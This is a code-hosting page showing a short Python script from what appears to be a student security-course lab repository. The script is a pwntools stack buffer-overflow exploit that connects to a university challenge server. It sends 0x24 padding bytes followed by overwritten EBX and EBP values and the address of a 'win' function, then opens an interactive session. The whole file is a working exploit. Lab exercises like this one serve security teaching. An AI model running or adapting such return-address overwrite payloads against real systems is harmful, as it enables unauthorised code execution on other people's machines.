didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
82b7b8c565c98c26bb8b6b55ce254855adbe7e15
ssof_labs/pa/lab6/chall_super_secure_system.py
Diogo Diniz 82b7b8c565 Partial lab6
2025-12-20 15:44:03 +00:00

16 lines
299 B
Python
Raw Blame History

from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25155
WIN_ADDR = p32(0x080487d9)
EBX = p32(0x804a001) # Has NULL byte
EBP = p32(0xffffcdd8)
#conn = process("./check")
conn = remote(HOST, PORT)
pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
input()
conn.send(pl)
conn.interactive()
Reference in New Issue View Git Blame Copy Permalink